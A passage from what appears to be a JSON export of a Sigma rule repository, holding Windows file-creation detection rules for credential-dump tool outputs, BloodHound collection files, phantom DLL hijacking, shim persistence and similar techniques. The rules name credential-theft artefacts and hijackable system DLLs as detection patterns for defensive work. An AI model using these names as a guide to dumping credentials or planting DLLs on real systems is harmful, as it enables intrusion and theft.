'.exe'\n    filter_dlls:\n        TargetFilename|endswith: '\\gcapi.dll'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_arcsoc_susp_file_created.yml",
    "content": "title: Suspicious File Created by ArcSOC.exe\nid: e890acee-d488-420e-8f20-d9b19b3c3d43\nstatus: experimental\ndescription: |\n    Detects instances where the ArcGIS Server process ArcSOC.exe, which hosts REST services running on an ArcGIS\n    server, creates a file with suspicious file type, indicating that it may be an executable, script file,\n    or otherwise unusual.\nreferences:\n    - https://reliaquest.com/blog/threat-spotlight-inside-flax-typhoons-arcgis-compromise/\n    - https://enterprise.arcgis.com/en/server/12.0/administer/windows/inside-an-arcgis-server-site.htm\nauthor: Micah Babinski\ndate: 2025-11-25\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1127\n    - attack.t1105\n    - attack.t1133\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\ArcSOC.exe'\n        TargetFilename|endswith:\n            - '.ahk'\n            - '.aspx'\n            - '.au3'\n            - '.bat'\n            - '.cmd'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.js'\n            - '.ps1'\n            - '.py'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_aspnet_temp_files.yml",
    "content": "title: Assembly DLL Creation Via AspNetCompiler\nid: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File\nrelated:\n    - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild\n      type: similar\n    - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths\n      type: similar\n    - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec\n      type: similar\nstatus: test\ndescription: |\n    Detects the creation of new DLL assembly files by \"aspnet_compiler.exe\", which could be a sign of \"aspnet_compiler\" abuse to proxy execution through a build provider.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-14\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\aspnet_compiler.exe'\n        TargetFilename|contains|all:\n            - '\\Temporary ASP.NET Files\\'\n            - '\\assembly\\tmp\\'\n            - '.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate assembly compilation using a build provider\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_bloodhound_collection.yml",
    "content": "title: BloodHound Collection Files\nid: 02773bed-83bf-469f-b7ff-e676e7d78bab\nstatus: test\ndescription: Detects default file names output by the BloodHound collection tool SharpHound\nreferences:\n    - https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection\nauthor: C.J. May\ndate: 2022-08-09\nmodified: 2026-02-19\ntags:\n    - attack.discovery\n    - attack.t1087.001\n    - attack.t1087.002\n    - attack.t1482\n    - attack.t1069.001\n    - attack.t1069.002\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - 'BloodHound.zip'\n            - '_computers.json'\n            - '_containers.json'\n            # - '_domains.json'  # prone to false positives with ProbabilisticRevealTokenRegistry function in Google Chrome\n            - '_gpos.json'\n            - '_groups.json'\n            - '_ous.json'\n            - '_users.json'\n    filter_optional_ms_winapps:\n        Image|endswith: '\\svchost.exe'\n        TargetFilename|startswith: 'C:\\Program Files\\WindowsApps\\Microsoft.'\n        TargetFilename|endswith: '\\pocket_containers.json'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Some false positives may arise in some environments and this may require some tuning. Add additional filters or reduce the level depending on the level of noise\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_comodo_itsm_potentially_suspicious_file_creation.yml",
    "content": "title: Potentially Suspicious File Creation by OpenEDR's ITSMService\nid: 9e4b7d3a-6f2c-4e9a-8d1b-3c5e7a9f2b4d\nstatus: experimental\ndescription: |\n    Detects the creation of potentially suspicious files by OpenEDR's ITSMService process.\n    The ITSMService is responsible for remote management operations and can create files on the system through the Process Explorer or file management features.\n    While legitimate for IT operations, creation of executable or script files could indicate unauthorized file uploads, data staging, or malicious file deployment.\nauthor: '@kostastsale'\ndate: 2026-02-19\nreferences:\n    - https://kostas-ts.medium.com/detecting-abuse-of-openedrs-permissive-edr-trial-a-security-researcher-s-perspective-fc55bf53972c\ntags:\n    - attack.command-and-control\n    - attack.t1105\n    - attack.lateral-movement\n    - attack.t1570\n    - attack.t1219\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_process:\n        Image|endswith: '\\COMODO\\Endpoint Manager\\ITSMService.exe'\n    selection_suspicious_extensions:\n        TargetFilename|endswith:\n            - '.7z'\n            - '.bat'\n            - '.cmd'\n            - '.com'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.js'\n            - '.pif'\n            - '.ps1'\n            - '.rar'\n            - '.scr'\n            - '.vbe'\n            - '.vbs'\n            - '.zip'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate OpenEDR file management operations\n    - Authorized remote file uploads by IT administrators\n    - Software deployment through OpenEDR console\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml",
    "content": "title: EVTX Created In Uncommon Location\nid: 65236ec7-ace0-4f0c-82fd-737b04fd4dcb\nstatus: test\ndescription: |\n    Detects the creation of new files with the \".evtx\" extension in non-common or non-standard locations.\n    This could indicate tampering with default EVTX locations in order to evade security controls, or simply exfiltration of event logs to search for sensitive information within them.\n    Note that backup software and legitimate administrators might perform similar actions during troubleshooting.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key\nauthor: D3F7A5105\ndate: 2023-01-02\nmodified: 2024-03-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: file_event\n    product: windows\n    definition: 'Requirements: The \".evtx\" extension should be monitored via a Sysmon configuration. Example: <TargetFilename condition=\"end with\">.evtx</TargetFilename>'\ndetection:\n    selection:\n        TargetFilename|endswith: '.evtx'\n    filter_main_path:\n        TargetFilename|startswith: 'C:\\Windows\\System32\\winevt\\Logs\\'\n    filter_main_baseimage:\n        TargetFilename|startswith: 'C:\\ProgramData\\Microsoft\\Windows\\Containers\\BaseImages\\'\n        TargetFilename|endswith: '\\Windows\\System32\\winevt\\Logs\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrator or backup activity\n    - An unknown bug seems to trigger the Windows \"svchost\" process to drop EVTX files in the \"C:\\Windows\\Temp\" directory in the form \"<log_name>_<uuid>.evtx\". See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml",
    "content": "title: Creation Of Non-Existent System DLL\nid: df6ecb8b-7822-4f4b-b412-08f524b4576c\nrelated:\n    - id: 6b98b92b-4f00-4f62-b4fe-4d1920215771 # ImageLoad rule\n      type: similar\nstatus: test\ndescription: |\n    Detects creation of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes.\n    Phantom DLL hijacking involves placing malicious DLLs with names of non-existent system binaries in locations where legitimate applications may search for them, leading to execution of the malicious DLLs.\n    Thus, the creation of such DLLs may indicate preparation for phantom DLL hijacking attacks.\nreferences:\n    - http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html\n    - https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/\n    - https://decoded.avast.io/martinchlumecky/png-steganography/\n    - https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc\n    - https://github.com/Wh04m1001/SysmonEoP\n    - https://itm4n.github.io/cdpsvc-dll-hijacking/\n    - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\n    - https://securelist.com/passiveneuron-campaign-with-apt-implants-and-cobalt-strike/117745/\n    - https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/\n    - https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n    - https://www.hexacorn.com/blog/2025/06/14/wermgr-exe-boot-offdmpsvc-dll-lolbin/\n    - https://www.hexacorn.com/blog/2025/06/14/wpr-exe-boottrace-phantom-dll-axeonoffhelper-dll-lolbin/\n    - https://x.com/0gtweet/status/1564131230941122561\nauthor: Nasreddine Bencherchali (Nextron Systems), fornotes\ndate: 2022-12-01\nmodified: 2026-01-24\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - ':\\Windows\\System32\\axeonoffhelper.dll'\n            - ':\\Windows\\System32\\cdpsgshims.dll'\n            - ':\\Windows\\System32\\oci.dll'\n            - ':\\Windows\\System32\\offdmpsvc.dll'\n            - ':\\Windows\\System32\\shellchromeapi.dll'\n            - ':\\Windows\\System32\\TSMSISrv.dll'\n            - ':\\Windows\\System32\\TSVIPSrv.dll'\n            - ':\\Windows\\System32\\wbem\\wbemcomn.dll'\n            - ':\\Windows\\System32\\WLBSCTRL.dll'\n            - ':\\Windows\\System32\\wow64log.dll'\n            - ':\\Windows\\System32\\WptsExtensions.dll'\n            - '\\SprintCSP.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_creation_deno.yml",
    "content": "title: Suspicious Deno File Written from Remote Source\nid: 6c0ce3b6-85e2-49d4-9c3f-6e008ce9796e\nstatus: experimental\ndescription: |\n    Detects Deno writing a file fetched via a direct HTTP(S) call into the AppData folder, or bringing its own malicious DLL.\n    This behavior may indicate an attempt to execute remotely hosted, potentially malicious files through Deno.\nreferences:\n    - https://taggart-tech.com/evildeno/\nauthor: Josh Nickels, Michael Taggart\ndate: 2025-05-22\ntags:\n    - attack.execution\n    - attack.t1204\n    - attack.t1059.007\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_path:\n        TargetFilename|contains:\n            - '\\deno\\gen\\'\n            - '\\deno\\remote\\https\\'\n        TargetFilename|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\'\n    condition: selection_path\nfalsepositives:\n    - Legitimate usage of Deno to request a file or bring a DLL to a host\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml",
    "content": "title: New Custom Shim Database Created\nid: ee63c85c-6d51-4d12-ad09-04e25877a947\nstatus: test\ndescription: |\n    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\n    The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory\n    - https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence\n    - https://liberty-shell.com/sec/2020/02/25/shim-persistence/\n    - https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-29\nmodified: 2023-12-06\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.009\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains:\n            - ':\\Windows\\apppatch\\Custom\\'\n            - ':\\Windows\\apppatch\\CustomSDB\\'\n    condition: selection\nfalsepositives:\n    - Legitimate custom SHIM installations will also trigger this rule\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml",
    "content": "title: Suspicious Screensaver Binary File Creation\nid: 97aa2e88-555c-450d-85a6-229bcd87efb8\nstatus: test\ndescription: |\n    Adversaries may establish persistence by executing malicious content triggered by user inactivity.\n    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md\nauthor: frack113\ndate: 2021-12-29\nmodified: 2022-11-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '.scr'\n    filter_generic:\n        Image|endswith:\n            - '\\Kindle.exe'\n            - '\\Bin\\ccSvcHst.exe' # Symantec Endpoint Protection\n    filter_tiworker:\n        # ParentCommandLine: C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p\n        Image|endswith: '\\TiWorker.exe'\n        TargetFilename|endswith: '\\uwfservicingscr.scr'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_creation_system_dll_files.yml",
    "content": "title: Files With System DLL Name In Unsuspected Locations\nid: 13c02350-4177-4e45-ac17-cf7ca628ff5e\nstatus: test\ndescription: |\n    Detects the creation of a file with the \".dll\" extension that has the name of a System DLL in uncommon or unsuspected locations (outside of \"System32\", \"SysWOW64\", etc.).\n    It is highly recommended to perform an initial baseline before using this rule in production.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-06-24\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            # Note: Add more System DLLs that can be abused for DLL sideloading to increase coverage\n            - '\\secur32.dll'\n            - '\\tdh.dll'\n    filter_main_generic:\n        # Note: It is recommended to use a more robust filter instead of this generic one, to avoid false negatives.\n        TargetFilename|contains:\n            # - '\\SystemRoot\\System32\\'\n            - 'C:\\$WINDOWS.~BT\\'\n            - 'C:\\$WinREAgent\\'\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n            - 'C:\\Windows\\uus\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Third party software might bundle specific versions of system DLLs.\n# Note: Upgrade to high after an initial baseline to your environment.\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_creation_system_file.yml",
    "content": "title: Files With System Process Name In Unsuspected Locations\nid: d5866ddf-ce8f-4aea-b28e-d96485a20d3d\nstatus: test\ndescription: |\n    Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.).\n    It is highly recommended to perform an initial baseline before using this rule in production.\nreferences:\n    - Internal Research\nauthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-05-26\nmodified: 2026-02-04\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\AtBroker.exe'\n            - '\\audiodg.exe'\n            - '\\backgroundTaskHost.exe'\n            - '\\bcdedit.exe'\n            - '\\bitsadmin.exe'\n            - '\\cmdl32.exe'\n            - '\\cmstp.exe'\n            - '\\conhost.exe'\n            - '\\csrss.exe'\n            - '\\dasHost.exe'\n            - '\\dfrgui.exe'\n            - '\\dllhost.exe'\n            - '\\dwm.exe'\n            - '\\eventcreate.exe'\n            - '\\eventvwr.exe'\n            - '\\explorer.exe'\n            - '\\extrac32.exe'\n            - '\\fontdrvhost.exe'\n            - '\\fsquirt.exe' # was seen used by sidewinder APT - https://securelist.com/sidewinder-apt/114089/\n            - '\\ipconfig.exe'\n            - '\\iscsicli.exe'\n            - '\\iscsicpl.exe'\n            - '\\logman.exe'\n            - '\\LogonUI.exe'\n            - '\\LsaIso.exe'\n            - '\\lsass.exe'\n            - '\\lsm.exe'\n            - '\\msiexec.exe'\n            - '\\msinfo32.exe'\n            - '\\mstsc.exe'\n            - '\\nbtstat.exe'\n            - '\\odbcconf.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regini.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\RuntimeBroker.exe'\n            - '\\schtasks.exe'\n            - '\\SearchFilterHost.exe'\n            - '\\SearchIndexer.exe'\n            - '\\SearchProtocolHost.exe'\n            - '\\SecurityHealthService.exe'\n            - '\\SecurityHealthSystray.exe'\n            - '\\services.exe'\n            - '\\ShellAppRuntime.exe'\n            - '\\sihost.exe'\n            - '\\smartscreen.exe'\n            - '\\smss.exe'\n            - '\\spoolsv.exe'\n            - '\\svchost.exe'\n            - '\\SystemSettingsBroker.exe'\n            - '\\taskhost.exe'\n            - '\\taskhostw.exe'\n            - '\\Taskmgr.exe'\n            - '\\TiWorker.exe'\n            - '\\vssadmin.exe'\n            - '\\w32tm.exe'\n            - '\\WerFault.exe'\n            - '\\WerFaultSecure.exe'\n            - '\\wermgr.exe'\n            - '\\wevtutil.exe'\n            - '\\wininit.exe'\n            - '\\winlogon.exe'\n            - '\\winrshost.exe'\n            - '\\WinRTNetMUAHostServer.exe'\n            - '\\wlanext.exe'\n            - '\\wlrmdr.exe'\n            - '\\WmiPrvSE.exe'\n            - '\\wslhost.exe'\n            - '\\WSReset.exe'\n            - '\\WUDFHost.exe'\n            - '\\WWAHost.exe'\n    filter_main_generic:\n        # Note: It is recommended to use a more robust filter instead of this generic one, to avoid false negatives.\n        TargetFilename|contains:\n            # - '\\SystemRoot\\System32\\'\n            - 'C:\\$WINDOWS.~BT\\'\n            - 'C:\\$WinREAgent\\'\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n            - 'C:\\Windows\\uus\\'\n    filter_main_tiworker:\n        Image|endswith:\n            - '\\TiWorker.exe'\n            - '\\wuaucltcore.exe'\n        TargetFilename|startswith: 'C:\\Windows\\Temp\\'\n    filter_main_svchost:\n        Image|endswith:\n            - 'C:\\Windows\\system32\\svchost.exe'\n            - 'C:\\Windows\\SysWOW64\\svchost.exe'\n        TargetFilename|contains:\n            - 'C:\\Program Files\\WindowsApps\\'\n            - 'C:\\Program Files (x86)\\WindowsApps\\'\n            - '\\AppData\\Local\\Microsoft\\WindowsApps\\'\n    filter_main_wuauclt:\n        Image:\n            - 'C:\\Windows\\System32\\wuauclt.exe'\n            - 'C:\\Windows\\SysWOW64\\wuauclt.exe'\n            - 'C:\\Windows\\UUS\\arm64\\wuaucltcore.exe'\n    filter_main_explorer:\n        TargetFilename|endswith: 'C:\\Windows\\explorer.exe'\n    filter_main_msiexec:\n        # This filter handles system processes which are updated/installed using msiexec.\n        Image|endswith:\n            - 'C:\\WINDOWS\\system32\\msiexec.exe'\n            - 'C:\\WINDOWS\\SysWOW64\\msiexec.exe'\n        # Add more processes if you find them or simply filter msiexec on its own. If the list grows big\n        TargetFilename|startswith:\n            - 'C:\\Program Files\\PowerShell\\7\\pwsh.exe'\n            - 'C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe'\n            - 'C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview\\'\n    filter_main_healtray:\n        TargetFilename|contains: 'C:\\Windows\\System32\\SecurityHealth\\'\n        TargetFilename|endswith: '\\SecurityHealthSystray.exe'\n        Image|endswith: '\\SecurityHealthSetup.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - System processes copied outside their default folders for testing purposes\n    - Third party software naming their software with the same names as the processes mentioned here\n# Note: Upgrade to high after an initial baseline to your environment.\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_creation_system_file/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml",
    "content": "title: Creation Exe for Service with Unquoted Path\nid: 8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9\nstatus: test\ndescription: |\n    Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\n    Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md\nauthor: frack113\ndate: 2021-12-30\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.009\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        # Feel free to add more\n        TargetFilename: 'C:\\program.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml",
    "content": "title: Cred Dump Tools Dropped Files\nid: 8fbf3271-1ef6-4e94-8210-03c2317947f6\nstatus: test\ndescription: Detects the creation of files with well-known filenames (parts of credential dump software or files produced by them)\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019-11-01\nmodified: 2025-10-25\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.t1003.002\n    - attack.t1003.003\n    - attack.t1003.004\n    - attack.t1003.005\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        - TargetFilename|contains:\n              - '\\fgdump-log'\n              - '\\kirbi'\n              - '\\pwdump'\n              - '\\pwhashes'\n              - '\\wce_ccache'\n              - '\\wce_krbtkts'\n        - TargetFilename|endswith:\n              - '\\cachedump.exe'\n              - '\\cachedump64.exe'\n              - '\\DumpExt.dll'\n              - '\\DumpSvc.exe'\n              - '\\Dumpy.exe'\n              - '\\fgexec.exe'\n              - '\\lsremora.dll'\n              - '\\lsremora64.dll'\n              - '\\NTDS.out'\n              - '\\procdump.exe'\n              - '\\procdump64.exe'\n              - '\\procdump64a.exe'\n              - '\\pstgdump.exe'\n              - '\\pwdump.exe'\n              - '\\SAM.out'\n              - '\\SECURITY.out'\n              - '\\servpw.exe'\n              - '\\servpw64.exe'\n              - '\\SYSTEM.out'\n              - '\\test.pwd'\n              - '\\wceaux.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator using tool for password recovery\nlevel: high\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml",
    "content": "title: WScript or CScript Dropper - File\nid: 002bdb95-0cf1-46a6-9e08-d38c128a6127\nrelated:\n    - id: cea72823-df4d-4567-950c-0b579eaf0846\n      type: derived\nstatus: test\ndescription: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe\nreferences:\n    - WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)\nauthor: Tim Shelton\ndate: 2022-01-10\nmodified: 2022-12-02\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n        TargetFilename|startswith:\n            - 'C:\\Users\\'\n            - 'C:\\ProgramData'\n        TargetFilename|endswith:\n            - '.jse'\n            - '.vbe'\n            - '.js'\n            - '.vba'\n            - '.vbs'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_csexec_service.yml",
    "content": "title: CSExec Service File Creation\nid: f0e2b768-5220-47dd-b891-d57b96fc0ec1\nstatus: test\ndescription: Detects default CSExec service filename which indicates CSExec service installation and execution\nreferences:\n    - https://github.com/malcomvetter/CSExec\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-04\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\csexecsvc.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml",
    "content": "title: Dynamic CSharp Compile Artefact\nid: e4a74e34-ecde-4aab-b2fb-9112dd01aed0\nstatus: test\ndescription: |\n    When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\n    Certain processes are not typically observed compiling C# code, but can do so without touching disk.\n    This can be used to unpack a payload for execution.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile\nauthor: frack113\ndate: 2022-01-09\nmodified: 2023-02-17\ntags:\n    - attack.defense-evasion\n    - attack.t1027.004\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '.cmdline'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml",
    "content": "title: Potential DCOM InternetExplorer.Application DLL Hijack\nid: 2f7979ae-f82b-45af-ac1d-2b10e93b0baa\nrelated:\n    - id: e554f142-5cf3-4e55-ace9-a1b59e0def65\n      type: obsolete\n    - id: f354eba5-623b-450f-b073-0b5b2773b6aa\n      type: similar\nstatus: test\ndescription: Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga\ndate: 2020-10-12\nmodified: 2022-12-18\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1021.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image: System\n        TargetFilename|endswith: '\\Internet Explorer\\iertutil.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_desktop_ini_created_by_uncommon_process.yml",
    "content": "title: Desktop.INI Created by Uncommon Process\nid: 81315b50-6b60-4d8f-9928-3466e1022515\nstatus: test\ndescription: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.\nreferences:\n    - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/\nauthor: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)\ndate: 2020-03-19\nmodified: 2025-12-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.009\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '\\desktop.ini'\n    filter_main_generic:\n        Image|startswith:\n            - 'C:\\Windows\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    filter_main_upgrade:\n        TargetFilename|startswith: 'C:\\$WINDOWS.~BT\\NewOS\\'\n    filter_optional_jetbrains:\n        Image|startswith: 'C:\\Users\\'\n        Image|endswith: '\\AppData\\Local\\JetBrains\\Toolbox\\bin\\7z.exe'\n        TargetFilename|contains: '\\JetBrains\\apps\\'\n    filter_optional_onedrive:\n        Image|startswith: 'C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\Microsoft\\OneDrive\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Operations performed through Windows SCCM or equivalent\n    - Read only access list authority\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml",
    "content": "title: DLL Search Order Hijacking Via Additional Space in Path\nid: b6f91281-20aa-446a-b986-38a92813a18f\nstatus: test\ndescription: |\n    Detects when an attacker creates a folder structure similar to Windows system folders (such as Windows, Program Files...)\n    but with a trailing space in order to trick the DLL load search order and perform a \"DLL Search Order Hijacking\" attack\nreferences:\n    - https://twitter.com/cyb3rops/status/1552932770464292864\n    - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-30\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith:\n            - 'C:\\Windows \\'\n            - 'C:\\Program Files \\'\n            - 'C:\\Program Files (x86) \\'\n        TargetFilename|endswith: '.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_dump_file_susp_creation.yml",
